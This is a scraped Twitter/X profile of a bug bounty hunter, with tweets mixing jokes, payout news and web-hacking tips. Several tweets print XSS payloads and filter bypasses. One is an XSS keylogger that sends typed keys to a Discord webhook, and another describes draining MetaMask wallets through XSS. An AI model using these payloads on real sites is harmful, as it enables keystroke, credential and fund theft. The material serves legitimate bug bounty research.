renniepak

@renniepak

10,215
Followers
300
Following
391
Media
3,433
Statuses

Self-XSS connoisseur. Elite Hacker. MVH H11337UPBash. One-Percent Man. Co-Founder @HackerHideout (he/him)

Joined May 2020
@renniepak
renniepak
1 year
I've created a JavaScript bookmarklet that will extract all endpoints (starting with /) from your current DOM and from all the external script sources embedded on the page. You can find it here, if you want to try it out: #bugbountytips
31
383
1K
@renniepak
renniepak
2 years
Yay! My report was accepted as Critical. I found a bug that would let me fetch any users password reset link. Since I don't often share a lot of my approach, I'll do a little write-up. 🧵1/x
@renniepak
renniepak
2 years
Just submitted a bug that I rechecked 10 times because I couldn't believe it worked.
4
0
92
21
154
806
@renniepak
renniepak
3 years
How to raise the impact of your HTML injection: <font color="red">ERROR 1064 (42000): You have an error in your SQL syntax; BOOM!
29
85
702
@renniepak
renniepak
4 years
Pretty happy with this one-liner to extract endpoints from JavaScript files: cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u #bugbountytips
10
351
696
@renniepak
renniepak
3 years
This is my new favorite XSS payload: "><svg><animate onbegin=prompt(document.domain) attributeName=x dur=1s>
7
166
599
@renniepak
renniepak
3 years
I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I'M A GENIUS! I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking. I suck at hacking.
12
70
595
@renniepak
renniepak
3 years
TIL: You can serve an XSS payload from an XML file: xss.xml: <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html=""> <html:script>prompt(document.domain);</html:script> </html> #bugbountytips #bugbounty
8
177
518
@renniepak
renniepak
1 year
Yay, I was awarded a $50,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder 🤯🤯🤯
38
12
518
@renniepak
renniepak
5 days
Just found out you can import external scripts with JavaScript's import() without quotes by just using a regex?
10
97
584
@renniepak
renniepak
1 year
🎉 Celebrating One Year as a Full-Time Bug Bounty Hunter! 🎉 🔒 It's been an incredible journey, and today marks the one-year anniversary of my full-time bug bounty hunting adventure! 🕵️‍♂️ As I reflect on the past year, I wanted to share some exciting statistics and highlights…
47
32
481
@renniepak
renniepak
2 years
Noob: "I am a pro!" Pro: "I am a noob!" #bugbountytips
17
51
460
@renniepak
renniepak
27 days
From now on I'll include confetti in my XSS POCs.
14
58
456
@renniepak
renniepak
3 years
OMG! This trick will get you XSS on any domain!!!1! #fakebugbountytips
13
106
401
@renniepak
renniepak
2 years
I'll give away a €20,- voucher for the @intigriti swag shop to a random person that interacts with this tweet. GO!
128
30
389
@renniepak
renniepak
1 year
I'm having an insane week.... Never found RCE before in my life this week. This week I've found 5! 🤯🤯🤯🤯
22
11
387
@renniepak
renniepak
1 year
XSS Payload - Discord Keylogger <img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>
10
77
350
@renniepak
renniepak
4 years
Tweet media one
18
24
326
@renniepak
renniepak
2 months
A quick way to find "all" paths for Next.js websites: console.log(__BUILD_MANIFEST.sortedPages)
6
61
313
@renniepak
renniepak
1 year
If you DM me, please first check if one of the following answers your question: 1. I am not your "bro" 2. I don't want to be your "mentor", nor do I want you as an "assistant" 3. Google "How to get started in bug bounty" 4. I strictly do ethical hacking -> No? Feel free to DM🙂
39
19
285
@renniepak
renniepak
8 months
Recently encountered a challenging Stored XSS case: - No dots - No parentheses - No plus - No single quote - No space - Max 35 characters - Unlimited amount of payloads can be stored - Every payload is reflected twice @0xH4rmony and I came up with this:
11
70
280
@renniepak
renniepak
2 years
Got some news to share: I've quit my job to become a full-time #bugbounty hunter! Have some time left at my current job and will first take a long vacation, so I'll start around summer! I'm simultaneously super excited and immensely terrified, but I'm looking forward to it!🙂
29
6
262
@renniepak
renniepak
6 months
Found this interesting DOM XSS case yesterday:
5
31
260
@renniepak
renniepak
2 years
Pro #bugbountytips : If you find 5 xsses (for example), report one, wait for it to be accepted/resolved, then report the next one(s). Prevents the "these all have the same root cause" trap.
11
24
250
@renniepak
renniepak
2 years
Tweet media one
6
47
225
@renniepak
renniepak
2 years
Imagine selflessly maintaining an open source project for years, struggling to get sponsors although all the major corporates are using your software. Then a bug gets disclosed and a bunch of bounty hunters who copy-paste a POC make more money in days than you ever did. #log4j
8
40
229
@renniepak
renniepak
8 months
I've made over 100k on XSS vulnerabilities. Here's how I did it: 🧵
8
25
230
@renniepak
renniepak
1 year
Having some fun with weaponising XSS payloads. This example will prompt MetaMask to connect to the site and initiate a transaction to transfer all of your $ETH.
16
30
217
@renniepak
renniepak
2 years
Today was my last day working as an ethical hacker @bol_com . Tomorrow I'll start my journey trying to make it as a full-time bug bounty hunter! Excited but also a bit anxious, but I'm sure it's going to be a great experience!
30
5
208
@renniepak
renniepak
1 year
My 5000th follower will receive a Professional Bug Bounty Certificate completely free of charge.
19
8
194
@renniepak
renniepak
4 years
Need a short domain for your XSS payload, but don't want to pay top dollar? Register a domain that can be written with alternate Unicode characters: For example ㎉.℡ (3 chars) will be normalized to . Cheat sheet: #bugbountytips
1
51
193
@renniepak
renniepak
3 years
I'll be giving away a €20,- voucher for the @intigriti swag store to the person who replies to this tweet with the best #bugbountytip ! Winner will be announced this Sunday (whenever I feel like it 😀)
70
35
187
@renniepak
renniepak
5 days
Another fun one to bypass certain blacklists is optional chaining: alert?.()
4
31
206
@renniepak
renniepak
2 months
Yay, I was awarded a $7,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder Best HTML injection ever! 😅
9
5
181
@renniepak
renniepak
8 months
My bug bounty automation flow: 1. Build a thing. 2. Let it run all night. 3. Wake up to realize it stopped due to some error after 15 min. 4. Repeat.
11
13
177
@renniepak
renniepak
3 years
<script>new Notification(1)</script> is the new alert(1)
4
27
167
@renniepak
renniepak
21 days
If you want a super quick way to create a wordlist of the current page you are visiting, you can use this Javascript Bookmarklet.
5
31
167
@renniepak
renniepak
2 years
A small thread on how an out-of-scope (or lower tier asset) vulnerability can still have an in-scope impact: #bugbountytips 🧵 1/x
5
35
156
@renniepak
renniepak
3 years
I normally find a lot of XSS. Somehow I have a feeling for spotting that, and while that is great, I would love to find more impactful bugs. I decided to focus on SQL Injection this weekend and actually found 2! My first ever SQL injection bug bounty reports!
13
5
154
@renniepak
renniepak
3 months
I like how browsers don't give a shit. <script/src=//㎠.℡></script> Fine! <script src=" https://r<tab>enni<new-line>"></script> Sure!
3
30
152
@renniepak
renniepak
2 years
Tweet media one
3
13
142
@renniepak
renniepak
1 year
Uncomfortable (unpopular?) opinion: If you need to DM someone with "how to get started in bug bounty" despite the abundance of information out there, bug bounty might not be your thing.
8
17
139
@renniepak
renniepak
1 year
If you're having trouble fingerprinting what tech stack a bug bounty target is using, check out their careers page for engineering positions. They'll probably list out exactly what they are using for you :) #bugbountytips
8
16
142
@renniepak
renniepak
2 years
Thanks for the swag! @DailySwig @PortSwigger
7
4
135
@renniepak
renniepak
2 years
I think 70% of my knowledge about hacking/security I've learned in the past 2 years, by reading stuff on the internet and experimenting with it in real life.
7
10
132
@renniepak
renniepak
2 years
Goals: report 1 valid smart contract vulnerability on @immunefi this year.
15
5
128
@renniepak
renniepak
3 years
Achievement unlocked: I duped myself. #BugBounty
12
1
128
@renniepak
renniepak
3 years
🥳🥳🥳 Just passed 1k reputation on @intigriti 🥳🥳🥳
10
0
123
@renniepak
renniepak
3 years
Tweet media one
4
5
123
@renniepak
renniepak
1 year
Ok, to make it up to you, let's do a REAL giveaway this time. Follow, like, retweet and comment with your best bug bounty joke or meme. The winner will be picked in 24 hours and will receive a €50 voucher for @intigriti 's swag shop:
45
37
122
@renniepak
renniepak
2 years
What's the best bug you ever found? I'll start: ATO of an admin account that gave me access to all tenants on the host. Found an endpoint in the js source. It returned STATIC access tokens of all users of my tenant including the admin account. Fun fact: admin token was "asfdsf".
34
18
124
@renniepak
renniepak
3 years
SSTI polyglot. (work in progress) - Apache Velocity - EJS - Freemarker - Jinja2 - Liquid - Smarty - Twig #bugbountytips
2
42
124
@renniepak
renniepak
2 years
Yay, I was awarded a -$xxxxx bounty by the tax authorities!
4
1
115
@renniepak
renniepak
2 years
I'm gonna sell my bug bounty reports as NFTs, making sure I'll never face another dupe in my life.
7
5
110
@renniepak
renniepak
2 years
Full time bug hunters: how many times per week do you have an existential crisis?
18
5
112
@renniepak
renniepak
3 years
Proud to be up there with these legends.
5
0
113
@renniepak
renniepak
1 year
A miracle happened today: I set up an Android Emulator and imported the Burp Certificate and everything worked first try. 🤯
17
1
112
@renniepak
renniepak
2 months
To make your XSS less "suspicious", you can hide your payload by updating the URL path with a "valid" url.
0
6
111
@renniepak
renniepak
3 years
That feeling when you find DOM XSS.
3
5
111
@renniepak
renniepak
2 years
Did you know, you can be a professional bug bounty hunter without ever having reported a critical/P1 on HackerOne/BugCrowd? 🫡
9
5
110
@renniepak
renniepak
2 years
Wanna see some magic? 👇
5
4
108
@renniepak
renniepak
3 years
HTTP/1.1 200 OK 404 Not Found 🤯
7
3
105
@renniepak
renniepak
3 years
🎉 Yay! Just passed 2000 reputation points on @intigriti !
7
0
107
@renniepak
renniepak
1 year
What was the best bug you found in 2022? Why was it the best?
35
12
106
@renniepak
renniepak
2 years
<NoteToSelf> #BugBountyTips Write a report that is reproducible, not only by the program, but also by the platform's triager. Triagers constantly need to switch contexts and therefore you can't expect them to have the same inside knowledge you and the program have. </NoteToSelf>
4
17
100
@renniepak
renniepak
2 years
Always add terms like "0-click" to your bug bounty report titles to maximize impact. "0-click missing SPF records. 💥BOOM!" #bugbountytips
10
7
101
@renniepak
renniepak
2 years
A fun way to "mitigate" XSS would be hosting a (image) file on httpx://domain.tld/x
5
12
93
@renniepak
renniepak
2 years
Just submitted a bug that I rechecked 10 times because I couldn't believe it worked.
4
0
92
@renniepak
renniepak
3 years
Weird alerts. (0,alert)(); alert?.(); Let's get weird: (0,alert)?.()?.(); (null,alert)``?.(); HappyWeekend:('🤖',alert)()?.(); #bugbounty
1
34
93
@renniepak
renniepak
2 months
When trying to bypass custom WAFs, that mostly blacklist certain words/characters, AUREBESH.js has worked multiple times for me.
@aemkei
Martin Kleppe
8 years
Releasing… /// AUREBESH.js → Translate JavaScript to other writing systems! # ΔYロIᗐコΞ 👾
6
73
173
1
18
94
@renniepak
renniepak
5 months
Finally, a job that matches my level of knowledge of cryptography.
4
7
91
@renniepak
renniepak
11 months
Life is tough as a bug bounty hunter.
3
1
89
@renniepak
renniepak
9 months
Pretty nifty way to (potentially) find new subdomains. I wonder if any bug hunters use this in their recon automation and if cracking the hashes is worth it?
0
13
86
@renniepak
renniepak
2 years
I love that when you use this XSS payload by @garethheyes , it alerts "Uncaught XSS" which is kind of fitting. var{haha:onerror=alert}=0;throw 'XSS' httpx://portswigger-labs.net/xss/xss.php?x=%3Cscript%3Evar{haha:onerror=alert}=0;throw%20%27XSS%27%3C%2Fscript%3E&context=html
2
17
86
@renniepak
renniepak
2 years
Respect to all beginners in #bugbounty out there. Currently focussing on smart contract hacking, which is totally new for me. Makes me feel like a beginner again, with all the worries, imposter syndrome etc. But let's keep learning and keep up our persistence! 💪
5
5
89
@renniepak
renniepak
1 year
How to DDoS a site for free: 1. Run a bug bounty program. 2. Send out an update that is now in scope. Done! Follow me for more quality content!
6
3
88
@renniepak
renniepak
1 year
Can you get XSS in this situation? 🤔
12
8
86
@renniepak
renniepak
2 years
"It's all about impact!" "What? ... Oh it's XSS? No that's just medium"
6
6
87
@renniepak
renniepak
3 years
Next time a VDP asks how you would like to appear in their Hall of Fame, pick: "><img src onerror=alert('username')> #bugbountytips #InfiniteFame
0
9
85
@renniepak
renniepak
8 months
Why make a $30.000 bounty once when you can make a $300 bounty ten times. Wait...
9
2
84
@renniepak
renniepak
8 months
Paste "><script>alert()</script> everywhere.
8
3
84
@renniepak
renniepak
1 year
"Only 2 requests per second are allowed." I broke the policy just by loading the page...
4
1
83
@renniepak
renniepak
3 years
Tweet media one
3
5
80
@renniepak
renniepak
1 year
Gotta give @Hacker0x01 triage my compliments! Submitted 3 reports today that were all triaged within 15 minutes! 🔥🔥🔥
8
2
81
@renniepak
renniepak
2 years
Sometimes you're stuck on an xss. You've checked all the cheat sheets, it seems vulnerable but you just can't make it work. Most of the time, your "xss" (in some variation) is equal to one of PortSwigger's "impossible labs". Great resource.
0
11
80
@renniepak
renniepak
2 years
Yay! Invited to my first IRL live hacking event. Now I can disappoint everyone in real life!
12
0
77
@renniepak
renniepak
4 years
I made a thing: This page helps you to convert the POST body of a request to a different Content-Type. Some webapps tend to behave differently for different Content-Types. Couldn't (easily) find existing ones that convert to urlencoded. #bugbountytips
3
26
74
@renniepak
renniepak
3 years
I created a JS bookmarklet to quickly fill all input fields (type="text") on a webpage with your favorite XSS payload. Just add it as a bookmark in your browser, click it, BOOM etc. #BugBountyTips ɴᴏᴛ ɢᴜᴀʀᴀɴᴛᴇᴇᴅ ᴛᴏ ᴡᴏʀᴋ 👀
5
23
73
@renniepak
renniepak
3 years
Uh... Thanks @redbull and @intigriti !!
1
1
74
@renniepak
renniepak
3 years
#BugBounty is weird. Monday: report SQLi = Duplicate Tuesday: find XSS = OoS Wednesday: F... this. Not hunting today. Get an email: Blind XSS on admin portal. Triaged. 🤷‍♂️
2
3
72
@renniepak
renniepak
3 years
Found 1,2 million XSSes yesterday and all I'll get is a lousy CVE number. Bounty please. 🤪
5
0
71
@renniepak
renniepak
2 years
I just successfully exploited a prototype pollution vulnerability that I wasn't able to exploit before, using DOM Invader! Thank you @PortSwiggerRes and @garethheyes !
@WebSecAcademy
Web Security Academy
2 years
We've got something exciting for you all next week, but in the meantime, why not brush up on your knowledge of prototype pollution - How to use browser APIs for prototype pollution - via @PortSwiggerRes 's recent post.
0
26
91
4
8
74
@renniepak
renniepak
2 years
#BugBounty be like: I report XSS. OOS. "XSS is now in scope" I report XSS. "This is a duplicate". Ok.
6
3
74
@renniepak
renniepak
5 months
This month I found XSS in a couple of third party widgets. According to BuiltWith (combining all of them) around 250k+ sites were/are vulnerable. Guess how much money I made until now.
24
0
72
@renniepak
renniepak
2 years
What a weekend! Really enjoyed my time at #1337UP0622 @intigriti . Finished 7th! 2nd with our team! Scored a critical! But the most valuable part of it all was meeting all those lovely, kind and inspiring people. Thanks all! See you soon hopefully!
4
1
73
@renniepak
renniepak
2 years
Since I almost have 3k followers, I'll be giving away absolutely nothing to my 3000th follower. #FollowTheRenniePack
18
2
73
@renniepak
renniepak
3 years
age = int("1337"[2:]) # 🎉
15
0
70
@renniepak
renniepak
2 years
Why is [redacted] bug bounty program sending me 10 emails (1 every hour) to inform me their campaign is ending?!
25
0
70